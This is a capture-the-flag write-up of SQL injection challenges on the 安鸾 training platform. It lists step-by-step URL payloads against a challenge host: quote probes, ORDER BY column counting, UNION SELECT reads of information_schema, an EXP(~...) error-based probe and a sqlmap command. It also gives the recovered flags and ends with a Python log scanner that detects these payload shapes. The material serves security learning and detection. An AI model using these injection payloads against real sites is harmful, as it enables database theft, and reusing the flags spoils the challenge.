Anluan (安鸾) SQL Series: Search-Type Injection
涂寐 Lv5

Disclaimer: the techniques, ideas and tools covered in this article are provided solely for security-oriented learning and exchange. Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences themselves!
This article was first published on 涂寐's Blogs: https://0xtlu.github.io/

0x01 Provided material

Challenge URL: http://47.103.94.191:8015/login.php

Hint: the flag is still in the database!

0x02 Low difficulty

Note: the thing to watch here is which positions in select 1,2,3,4,5,6,7 are echoed to the front end.
flag: flag{86b757e867b43d16050225ab516b2274}

http://47.103.94.191:8015/sqli_1.php?title=1%27 or 1=1%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27order by 8%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,2,3,4,5,6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),5,6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()),6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select group_concat(column_name) from information_schema.columns where table_name = 'this_flag'),6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select group_concat(flag) from this_flag),6,7%23&action=search
http://47.103.94.191:8015/sqli_1.php?title=1%27union select 1,version(),user(),database(),(select flag from this_flag limit 1,1),6,7%23&action=search


0x02 Other difficulties

I'll come back to these once I have learned more...

0x03 SQL numeric GET injection 02

Provided information

Challenge URL: http://47.103.94.191:8034/

Hint: the flag is in the database

Article view

Note: open any article and append a single quote; it errors straight away. As before, we need to work out which controllable positions are echoed to the front end, and for the statement after UNION to be displayed the id has to be made negative so that a display slot is freed up. A fuzzy search with **like '%flag%'** against information_schema gives the database, table and column names holding the flag, but it is basically in the current database and the column is named flag.
flag: **flag{16aeb3e6d73689bf456c5c50f2d04b84}**

http://47.103.94.191:8034/show.php?id=35'
http://47.103.94.191:8034/show.php?id=35 order by 16
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),database(),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select count(table_name) from information_schema.columns where table_schema = database()),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(table_name) from information_schema.columns where column_name like '%flag%'),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(table_schema) from information_schema.columns where table_name = 'this_is_flag'),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(column_name) from information_schema.columns where table_name = 'this_is_flag'),13,14,15
http://47.103.94.191:8034/show.php?id=-35 union select 1,2,user(),4,5,6,7,8,9,10,version(),(select group_concat(flag) from this_is_flag),13,14,15


Search bar

At first I entered a single quote here as well, but I was only looking at the returned "Search keyword: wordpress'", and with the background colour in the way I genuinely did not notice the error echo. After some fiddling, as long as no error is triggered it only returns whatever was typed into the search box, so it looks like the input is cast to a string and echoed to the front end; hence error-based injection.

http://47.103.94.191:8034/search.php?keywords=1'&button=%E6%90%9C%E7%B4%A2
http://47.103.94.191:8034/search.php?keywords=1' order by 15-- -&button=%E6%90%9C%E7%B4%A2
http://47.103.94.191:8034/search.php?keywords=1' union SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,EXP(~(SELECT DATABASE()))-- -&button=%E6%90%9C%E7%B4%A2
sqlmap -u 'http://47.103.94.191:8034/search.php?keywords=1&button=%E6%90%9C%E7%B4%A2'  -v 1 --dbs
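On the defensive side, the request shapes used throughout this write-up (the single-quote probe, ORDER BY column counting, UNION SELECT with information_schema reads, and the EXP(~(...)) error-based probe) are easy to pick out of web-server access logs once the query string is URL-decoded. The following Python is an added example, not code from the original post or the 安鸾 platform; the log lines and client addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Injection stages seen in the write-up, most specific first so that a
# UNION payload carrying information_schema or EXP(~...) gets the
# sharper label rather than the generic one.
SIGNATURES = [
    ("error-based",  re.compile(r"exp\s*\(\s*~", re.I)),
    ("schema-enum",  re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    # Noisiest signal: a quote followed by a boolean, a comment or nothing.
    ("quote-probe",  re.compile(r"'\s*(or\b|--|#|$)", re.I)),
]

def classify_request(url):
    """Return (parameter, stage) for the first parameter whose decoded value
    matches a signature, or None. parse_qsl turns %27 into ' and %23 into #."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                return (name, label)
    return None

# Combined log format: client, ident, user, [timestamp], "METHOD path ..."
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def scan_log(lines):
    """Return (client, parameter, stage) for every line carrying a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, path = m.groups()
        found = classify_request("http://h" + path)  # dummy host for urlsplit
        if found:
            hits.append((client, found[0], found[1]))
    return hits

# Constructed sample lines mirroring the payload shapes from the write-up.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0800] "GET /sqli_1.php?title=1%27%20or%201=1%23&action=search HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0800] "GET /sqli_1.php?title=1%27order%20by%208%23&action=search HTTP/1.1" 200 43',
    '203.0.113.7 - - [10/Oct/2023:13:55:51 +0800] "GET /sqli_1.php?title=1%27union%20select%201,2,3,4,5,6,7%23&action=search HTTP/1.1" 200 600',
    '203.0.113.7 - - [10/Oct/2023:13:56:02 +0800] "GET /show.php?id=-35%20union%20select%201,2,user(),4,(select%20group_concat(table_name)%20from%20information_schema.columns%20where%20column_name%20like%20%27%25flag%25%27),6 HTTP/1.1" 200 700',
    '203.0.113.7 - - [10/Oct/2023:13:56:15 +0800] "GET /search.php?keywords=1%27%20union%20SELECT%201,2,EXP(~(SELECT%20DATABASE()))--%20-&button=x HTTP/1.1" 500 300',
    '198.51.100.4 - - [10/Oct/2023:13:56:20 +0800] "GET /search.php?keywords=wordpress&button=x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, param, stage in scan_log(SAMPLE_LOG):
        print(f"{client} param={param} stage={stage}")
```

A raw, unencoded `#` in a request line would be dropped by urlsplit as a fragment, so decode the request line only once, as above, rather than pre-decoding it yourself.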